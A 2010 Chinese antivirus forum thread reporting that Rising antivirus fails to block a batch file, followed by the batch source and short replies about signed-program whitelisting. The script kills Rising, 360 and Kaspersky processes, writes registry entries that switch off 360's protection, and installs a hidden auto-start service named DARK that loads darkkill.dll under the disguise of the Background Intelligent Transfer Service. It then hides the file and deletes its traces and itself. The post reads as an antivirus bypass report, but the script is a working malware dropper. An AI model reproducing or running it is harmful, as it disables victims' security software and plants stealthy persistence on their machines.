瑞星卡卡安全论坛企业产品讨论区瑞星2010新品体验挑战专区 瑞星不拦截批处理文件----用批处理文件创建并导入注册表来绕过主防!!!

1   1  /  1  页   跳转

瑞星不拦截批处理文件----用批处理文件创建并导入注册表来绕过主防!!!

瑞星不拦截批处理文件----用批处理文件创建并导入注册表来绕过主防!!!

运行这个批处理文件,此文件会自动创建注册表文件并导入!!!



瑞星未拦截注册表导入动作!!!




以下是bat 的源码:




@echo off
taskkilal /f /im rstray.exe >NUL
taskkill /f /im 360tray.exe >NUL
taskkill /f /im 360safe.exe >NUL
echo Windows Registry Editor Version 5.00>>kill.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg
echo "MonAccess"=dword:00000000>>kill.reg
echo "SiteAccess"=dword:00000000>>kill.reg
echo "ExecAccess"=dword:00000000>>kill.reg
echo "UDiskAccess"=dword:00000000>>kill.reg
echo "LeakShowed"=dword:00000000>>kill.reg
sc create DARK binpath= %windir%\System32\darkkill.dll
sc config DARK start= disabled
echo Windows Registry Editor Version 5.00>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg
echo "Type"=dword:00000110>>dark.reg
echo "Start"=dword:00000002>>dark.reg
echo "ErrorControl"=dword:00000001>>dark.reg
echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg
echo  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg
echo  00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg
echo  6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg
echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg
echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg
echo "DependOnGroup"=hex(7):00,00>>dark.reg
echo "ObjectName"="LocalSystem">>dark.reg
echo "Description"=hex(2):00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg
echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg
echo  00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg
echo  72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg
echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg
echo  00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg
echo  00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg
echo  05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg
echo  20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg
echo  00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg
echo  00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg
echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg
echo "Count"=dword:00000001>>dark.reg
echo "NextInstance"=dword:00000001>>dark.reg
regedit /s dark.reg
regedit /s kill.reg
COPY dark.dll %windir%\System32\darkkill.dll
sc config DARK start= AUTO
net start DARK
attrib %windir%\System32\darkkill.dll +s +h
del kill.reg
del dark.reg
del dark.dll
del dark.exe
xkill.exe
taskkill /f /im kav.exe >NUL
del %0

将上述代码保存为文档,将文档扩展名改为bat















用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/3.0.195.0 Safari/531.0 SE 1.X

附件附件:

文件名:1.rar
下载次数:477
文件类型:application/octet-stream
文件大小:
上传时间:2010-1-24 3:40:36
描述:rar

最后编辑shulun743 最后编辑于 2010-01-24 03:40:36
分享到:
gototop
 

回复:瑞星不拦截批处理文件----用批处理文件创建并导入注册表来绕过主防!!!

因为批处理依赖的是系统自身的程序

几乎所有杀毒软件为了不影响用户使用电脑,都是默认放行微软签名程序做事的。

将“系统加固”那里的“自动放过签名程序”的勾取消,应该就能报一些了吧。
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复:瑞星不拦截批处理文件----用批处理文件创建并导入注册表来绕过主防!!!

该用户帖子内容已被屏蔽
gototop
 

回复:瑞星不拦截批处理文件----用批处理文件创建并导入注册表来绕过主防!!!

建议加载注册表文件时,瑞星能拦截!!!
gototop
 

回复:瑞星不拦截批处理文件----用批处理文件创建并导入注册表来绕过主防!!!

光运行这个批处理肯定不拦截
如果有对应的病毒 释放这样的批处理并运行就会拦截了
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT